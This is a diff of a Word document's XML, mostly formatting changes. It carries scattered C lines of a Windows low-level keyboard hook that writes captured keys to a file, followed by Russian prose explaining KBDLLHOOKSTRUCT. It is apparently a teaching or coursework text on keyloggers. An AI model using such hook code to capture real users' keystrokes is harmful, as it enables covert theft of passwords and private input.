-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>{</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>strcpy(buf + 1, "\r\n");</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4587,51 +5001,41 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>strcpy(buf + 1, "\r\n");</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4639,51 +5043,49 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4691,34 +5093,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>}</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>else</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4726,34 +5126,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>else</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4761,34 +5159,41 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>{</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>strcat(g_buf, "[unknown]\r\n");</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4796,43 +5201,41 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>strcat(g_buf, "[unknown]\r\n");</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4840,43 +5243,32 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL);</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4884,30 +5276,19 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
@@ -4919,25 +5300,23 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>}</w:t>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return CallNextHookEx(hook, nCode, wParam, lParam);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4945,428 +5324,2927 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="2355"/>
         </w:tabs>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Структура KBDLLHOOKSTRUCT содержит информацию о низкоуровневом событии ввода данных с клавиатуры.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>return CallNextHookEx(hook, nCode, wParam, lParam);</w:t>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>typedef struct {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    DWORD  vkCode;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    DWORD  scanCode;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    DWORD  flags;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    DWORD  time;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ULONG_PTR  dwExtraInfo;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>} KBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vkCode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>устанавливает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>код</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>виртуальной</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
